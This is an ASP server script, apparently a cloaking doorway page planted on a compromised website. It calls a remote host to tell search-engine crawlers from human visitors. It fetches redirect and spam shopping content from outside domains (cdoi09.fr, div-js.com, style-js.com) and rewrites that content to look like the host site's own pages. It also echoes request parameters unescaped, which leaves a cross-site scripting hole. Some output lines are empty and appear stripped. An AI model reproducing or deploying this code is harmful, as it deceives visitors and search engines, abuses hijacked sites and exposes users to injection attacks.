%
Function getHTTPPage(url)
On Error Resume Next
dim http
set http=Server.createobject("Microsoft.XMLHTTP")
Http.open "GET",url,false
Http.setRequestHeader "User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytesToBSTR(Http.responseBody,"utf-8")
set http=nothing
If Err.number<>0 then
Response.Write "
"
Response.end
Err.Clear
End If
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Randomize
%>
<%
if request("kk")<>"" then
ip="66.249.64.190"
else
ip=Request.ServerVariables("REMOTE_ADDR")
end if
ipurl="http://cdoi09.fr/getdomain.aspx?rnd=1&ip="&ip
domain =getHTTPPage(ipurl)
if(instr(domain,"google")=0 and instr(domain,"msn.com")=0 and instr(domain,"yahoo.com")=0 and instr(domain,"aol.com")=0) then
if request("shop")<>"" then
ddd=getHTTPPage("http://tz.div-js.com/xtz2.txt")
ddd=ddd&"?cid="&request("cid")&"&cname="&Server.URLEncode(request("shop"))&"&xi="&request("xi")&"&xc="&request("xc")
Response.write ""
end if
if request("searchtxt")<>"" then
ddd=getHTTPPage("http://tz.div-js.com/xtz2.txt")
ddd=ddd&"?cid="&request("cid")&"&cname="&Server.URLEncode(request("searchtxt"))&"&xi="&request("xi")&"&xc="&request("xc")
Response.write ""
end if
if request("pnum")<>"" then
ddd=getHTTPPage("http://tz.div-js.com/xtz2.txt")
ddd=Replace(ddd, "products.aspx", "")
ddd=ddd&"?cid="&request("cid")&""
Response.write ""
end if
end if
%>
<%=request("shop")%><%=request("searchtxt")%> Online Shopping mall | Find the best prices and places to buy -<%=request("pnum")%>
<%=request("searchtxt")%>"/>
<%=request("searchtxt")%> > Sale OFF-<%=INT((65-50+1)*RND+50)%>% Easy,Convenient,Fashion,Cheaper Than Retail Price> Buy Clothing, Accessories and lifestyle products for women & men & child | <%=request("shop")%><%=request("searchtxt")%>" />
<%
Dim Url,Html,hyzhdy
hyzhdy="http://jb2img.style-js.com/GD_Page.aspx"
if request("type")<>"" then
if(request("type")="search") then
URL=hyzhdy&"?cid="&request("cid")&"&xi=1&xc=36&searchtxt="&request("searchtxt")&"&you=0&page="&Request.ServerVariables("SCRIPT_NAME")
con=getHTTPPage(URL)
Response.write con
end if
else
if request("shop")<>"" then
URL=hyzhdy&"?cid="&request("cid")&"&shop="&Server.URLEncode(request("shop"))&"&xi="&request("xi")&"&xc="&request("xc")&"&pl="&request("pl")&"&pr="&request("pr")&"&you="&request("you")&"&mt=http://tz.div-js.com/en/enm.txt"
else
cid=int((68-1+1)*rnd+1)
if request("cid")<>"" then
cid=request("cid")
end if
URL=hyzhdy&"?cid="&cid&"&xi=1&xc=36&pnum="&request("pnum")&"&you=0&page="&Request.ServerVariables("SCRIPT_NAME")
end if
con=getHTTPPage(URL)
con=Replace(con,"&you=0","")
con=Replace(con,"&pl=","")
con=Replace(con, "HHHHH", Request.ServerVariables("SCRIPT_NAME"))
con=Replace(con, "BBBBB", Request.ServerVariables("HTTP_HOST"))
con=Replace(con, "AAAAA", Request.ServerVariables("SCRIPT_NAME")&"?gj=com&type=addtocart")
con=Replace(con, "DDDDD", request("shop")&" Gold White Black Red Blue Beige Grey Price Rose Orange Purple Green Yellow Cyan Bordeaux pink Indigo Brown Silver "&request("searchtxt")&request("shop"))
con=Replace(con, "QQQQQ", "http://"&Request.ServerVariables("HTTP_HOST")&Request.ServerVariables("PATH_INFO")&"?"&Request.ServerVariables("QUERY_STRING"))
Response.write con
end if
%>